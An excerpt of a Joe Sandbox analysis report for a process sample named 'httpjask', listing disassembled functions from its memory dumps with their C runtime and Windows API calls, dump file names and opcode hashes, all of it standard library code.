Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: C
API String ID: 1088826258-2531096973
Opcode ID: ff4be285de13943d9778dfab85af5945183a781a7767a091cb93d93501f785a8
Instruction ID: 4dd98d7af26142a4466cad4ff61c98b230961ed8d349f5840d2b34cd6684f245
Opcode Fuzzy Hash: ff4be285de13943d9778dfab85af5945183a781a7767a091cb93d93501f785a8
Instruction Fuzzy Hash: 8101BC72A069988BCB06EB32D84553D7BF5FFC5344B085009E95177392CFB4AE02DB81

Function 00EEF00E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E4349370,?,?,00000000,00EFD6C8,000000FF,?,00EEEF9E,?,?,00EEEF72,00000016), ref: 00EEF043
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EEF055
FreeLibrary.KERNEL32(00000000,?,00000000,00EFD6C8,000000FF,?,00EEEF9E,?,?,00EEEF72,00000016), ref: 00EEF077

Strings

C, xrefs: 00EEF066
mscoree.dll, xrefs: 00EEF03C
CorExitProcess, xrefs: 00EEF04D

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$C
API String ID: 4061214504-1185792191
Opcode ID: ecf96f443fecffcb2f6499c088ea02a26684a888e7f0cb77efc4def6f44635b1
Instruction ID: 06213835ab224326945cd92b29ac9f482ae3eef91597eb520fa46c6c7ff472e0
Opcode Fuzzy Hash: ecf96f443fecffcb2f6499c088ea02a26684a888e7f0cb77efc4def6f44635b1
Instruction Fuzzy Hash: FF01AD3290065DBFDB219F51DC09FBEBBB9FB44B14F000529E811B22E0DFB4A904DA90

Function 00F2B2FB Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00F2B4EB

Part of subcall function 00F272BC: DName::doPchar.LIBCMT ref: 00F272E5

DName::DName.LIBCMT ref: 00F2B57B
DName::operator+.LIBCMT ref: 00F2B582
DName::DName.LIBCMT ref: 00F2B5A5
DName::operator+.LIBCMT ref: 00F2B5AC
DName::operator+=.LIBCMT ref: 00F2B5B8
DName::operator=.LIBCMT ref: 00F2B5DF
DName::operator+=.LIBCMT ref: 00F2B5F1
DName::operator=.LIBCMT ref: 00F2B605
UnDecorator::getPtrRefType.LIBCMT ref: 00F2B61A
operator+.LIBCMT ref: 00F2B62C

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction ID: e5215b6c21f518b223a5026c9bd7bbd0989f3c6a1f8e13a6564b22b96248a649
Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
Instruction Fuzzy Hash: 1D218176E0412A9ACF18EFBCE956ABDBB749B04312F084169EA11DB548D7349E00AB10

Function 00F2B319 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00F2B4EB

Part of subcall function 00F272BC: DName::doPchar.LIBCMT ref: 00F272E5

DName::DName.LIBCMT ref: 00F2B57B
DName::operator+.LIBCMT ref: 00F2B582
DName::DName.LIBCMT ref: 00F2B5A5
DName::operator+.LIBCMT ref: 00F2B5AC
DName::operator+=.LIBCMT ref: 00F2B5B8
DName::operator=.LIBCMT ref: 00F2B5DF
DName::operator+=.LIBCMT ref: 00F2B5F1
DName::operator=.LIBCMT ref: 00F2B605
UnDecorator::getPtrRefType.LIBCMT ref: 00F2B61A
operator+.LIBCMT ref: 00F2B62C

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction ID: 42261ef50bad9f3a76866185016f9044d434ff6a9bc6d984e8def4e4599f5b2a
Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
Instruction Fuzzy Hash: 2F218176E0412A9ACF18EEBCE956ABD7B749B04312F084169EA11DB548D7349A00AB10

Function 00F2B305 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00F2B4EB

Part of subcall function 00F272BC: DName::doPchar.LIBCMT ref: 00F272E5

DName::DName.LIBCMT ref: 00F2B57B
DName::operator+.LIBCMT ref: 00F2B582
DName::DName.LIBCMT ref: 00F2B5A5
DName::operator+.LIBCMT ref: 00F2B5AC
DName::operator+=.LIBCMT ref: 00F2B5B8
DName::operator=.LIBCMT ref: 00F2B5DF
DName::operator+=.LIBCMT ref: 00F2B5F1
DName::operator=.LIBCMT ref: 00F2B605
UnDecorator::getPtrRefType.LIBCMT ref: 00F2B61A
operator+.LIBCMT ref: 00F2B62C

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction ID: 8d932e3c845862842abd1842b474b7f3ac8f34077de656b93e96d09b5b8f78ca
Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
Instruction Fuzzy Hash: B8218176E0412A9ACF18EEBCE956ABD7B749B04312F084169EA11DB548D734DA00AB10

Function 00F2B30F Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 00F2B4EB

Part of subcall function 00F272BC: DName::doPchar.LIBCMT ref: 00F272E5

DName::DName.LIBCMT ref: 00F2B57B
DName::operator+.LIBCMT ref: 00F2B582
DName::DName.LIBCMT ref: 00F2B5A5
DName::operator+.LIBCMT ref: 00F2B5AC
DName::operator+=.LIBCMT ref: 00F2B5B8
DName::operator=.LIBCMT ref: 00F2B5DF
DName::operator+=.LIBCMT ref: 00F2B5F1
DName::operator=.LIBCMT ref: 00F2B605
UnDecorator::getPtrRefType.LIBCMT ref: 00F2B61A
operator+.LIBCMT ref: 00F2B62C

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
String ID:
API String ID: 4267394785-0
Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction ID: 59b7420da34d36f977cf6e731892e8285527a241a5432bf630e1905fe53396d8
Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
Instruction Fuzzy Hash: 02218176E0412A9ACF18EEBCE956ABD7B749F04312F084169EA11DB548D7349A00AB10

Function 00EEA22A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EEA221,00EE841B,00EE7AD5), ref: 00EEA238
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EEA246
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EEA25F
SetLastError.KERNEL32(00000000,00EEA221,00EE841B,00EE7AD5), ref: 00EEA2B1

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d4a3015adc33a7d6504012d37e972d9c8bcc0bf949d08186d8e823728b7d25fd
Instruction ID: 95cdd601de24d699303b916d8adb767d00194dfba6992f833c2226bb491bcde7
Opcode Fuzzy Hash: d4a3015adc33a7d6504012d37e972d9c8bcc0bf949d08186d8e823728b7d25fd
Instruction Fuzzy Hash: 3501683210D69D9ED22017737C4662B36D9FB05B74324133DF220710F1FF222C05A202

Function 00F2FFAB Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00F2FF02

Part of subcall function 00F25D30: __mtinitlocknum.LIBCMT ref: 00F25D46
Part of subcall function 00F25D30: __amsg_exit.LIBCMT ref: 00F25D52

_free.LIBCMT ref: 00F2FF29
__lock.LIBCMT ref: 00F2FF42
___removelocaleref.LIBCMT ref: 00F2FF51
___freetlocinfo.LIBCMT ref: 00F2FF6A
_free.LIBCMT ref: 00F2FF87

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 1181530324-0
Opcode ID: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction ID: 0545687d589d5c394dee4e85aa6617612662e89e2e4d64d3eb737cc947ede866
Opcode Fuzzy Hash: 14eb0c7fe894d5b8d852f0898a8411548b399900cf7780233aa77db08523b3c3
Instruction Fuzzy Hash: 4711A031A25720AADB20AF74BA0A71DB3B49F05B30F644639F084D71D5DB3C9884BA25

Function 00EEA341 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00EEA408
___AdjustPointer.LIBCMT ref: 00EEA42B
___AdjustPointer.LIBCMT ref: 00EEA4C7

Strings

C, xrefs: 00EEA3A0

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID: C
API String ID: 1740715915-2531096973
Opcode ID: 97c2420479d4beb097ff006a1b9272d37dcff63c9c2909989be10f8288238729
Instruction ID: a728bcd07e5f041039e55054fb4f275572c03c52b1d8ac40af01316d08ce0f3c
Opcode Fuzzy Hash: 97c2420479d4beb097ff006a1b9272d37dcff63c9c2909989be10f8288238729
Instruction Fuzzy Hash: C451017260468EAFDB288F12D845BBA73A4EF44704F18603DE865672D1E7B1FC80C792

Function 00F1CBA8 Relevance: 7.8, APIs: 5, Instructions: 297COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1CC2F
_memset.LIBCMT ref: 00F1CC40
_memset.LIBCMT ref: 00F1CD08
_memset.LIBCMT ref: 00F1CD74
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F1CE96

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2583058844-0
Opcode ID: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction ID: f939fa744eb3b69137db215d35d96fae1e6688d4c5fc593e4f270a9e32dc23ce
Opcode Fuzzy Hash: d5154201261d98dd49ec3167d00f3a754cd273ccce8e86cb9f9af44637ef3501
Instruction Fuzzy Hash: BBC11A72D4021AABCF21EB64DC45AED777DAF08314F0140A5FA09B3151DB399F85AF91

Function 00F2CB17 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 00F2CB2B
__init_pointers.LIBCMT ref: 00F2CBDD
__calloc_crt.LIBCMT ref: 00F2CC4B
__initptd.LIBCMT ref: 00F2CC70

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction ID: 81a9fd1aafc42b0bf0be8e7983c1e3a69ad6a6dad5e05f52b8a1178697deb555
Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction Fuzzy Hash: 6A315235D443609ACB23AF79BD4961A3FA4EF85722B100636E414D31B1DFB5C440EF99

Function 00F27A22 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00F27A6B
DName::operator+.LIBCMT ref: 00F27A72
DName::DName.LIBCMT ref: 00F27A94
DName::operator+.LIBCMT ref: 00F27A9B
DName::operator+.LIBCMT ref: 00F27AA2

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction ID: 01d3a39431378f3a8159e17ff321db69da7cf9af0d0159d134687a67eca4dd01
Opcode Fuzzy Hash: 3aa0acc439a82f8bd65084423e96e0a9ca118dedd833d16da9c95a53395b9bdd
Instruction Fuzzy Hash: 96019B30A04319AFCF04FF64EC56DED7BB5EF44714F504059F5019B291EA74EA459B84

Function 00EE363A Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EE3646
int.LIBCPMT ref: 00EE3659

Part of subcall function 00EE16AA: std::_Lockit::_Lockit.LIBCPMT ref: 00EE16BB
Part of subcall function 00EE16AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00EE16D5

std::_Facet_Register.LIBCPMT ref: 00EE368C
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE36A2
Concurrency::cancel_current_task.LIBCPMT ref: 00EE36AD

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 37011aaf9ce344b808e8dcee2913f886128970fff1cabaede15d1660f3ae7ac0
Instruction ID: 44bdd08fa6a4e8317ad2887b2ae9583cd6884d74b43049fd4f2b7aa4344a42d5
Opcode Fuzzy Hash: 37011aaf9ce344b808e8dcee2913f886128970fff1cabaede15d1660f3ae7ac0
Instruction Fuzzy Hash: 4C01DF3290019DBBCB14EB76D8098AD77B8EF80364B241199F516BB2A1EB709F81C781

Function 00EE2B16 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EE2B22
int.LIBCPMT ref: 00EE2B35

Part of subcall function 00EE16AA: std::_Lockit::_Lockit.LIBCPMT ref: 00EE16BB
Part of subcall function 00EE16AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00EE16D5

std::_Facet_Register.LIBCPMT ref: 00EE2B68
std::_Lockit::~_Lockit.LIBCPMT ref: 00EE2B7E
Concurrency::cancel_current_task.LIBCPMT ref: 00EE2B89

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: eaafaad8eccfa7fd30721b3a4416b901e408d9ed6ee6207ae4b3e179510bf057
Instruction ID: 6bd0c142f60baa2da908a122d5871f89014cfd7d5894e00e69538a9e783d477f
Opcode Fuzzy Hash: eaafaad8eccfa7fd30721b3a4416b901e408d9ed6ee6207ae4b3e179510bf057
Instruction Fuzzy Hash: E101A77290055CABCB15EF66D8498ED77FCDF80760B141199F91677291EB709E41C780

Function 00F2FFB6 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00F2FFC2

Part of subcall function 00F2C954: __getptd_noexit.LIBCMT ref: 00F2C957
Part of subcall function 00F2C954: __amsg_exit.LIBCMT ref: 00F2C964

__calloc_crt.LIBCMT ref: 00F2FFCD
__lock.LIBCMT ref: 00F30003
___addlocaleref.LIBCMT ref: 00F3000F
__lock.LIBCMT ref: 00F30023

Part of subcall function 00F2BAF4: __getptd_noexit.LIBCMT ref: 00F2BAF4

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 2820776222-0
Opcode ID: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction ID: eaa80093e530c9610ba848328852a6f426c423050045ae6640b484060e3d7107
Opcode Fuzzy Hash: 2c0f3218e348ac7c5fd0d4c97702a7053877af8ef00d8f5bc14db8e52945bb76
Instruction Fuzzy Hash: 6B018F71505721EAEB20BFB4AC07B5CB7A0AF05B20F604619F458AB2C1CF7C4940AB95

Function 00F2E719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00F2E725

Part of subcall function 00F2C954: __getptd_noexit.LIBCMT ref: 00F2C957
Part of subcall function 00F2C954: __amsg_exit.LIBCMT ref: 00F2C964

__getptd.LIBCMT ref: 00F2E73C
__amsg_exit.LIBCMT ref: 00F2E74A
__lock.LIBCMT ref: 00F2E75A
__updatetlocinfoEx_nolock.LIBCMT ref: 00F2E76E

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
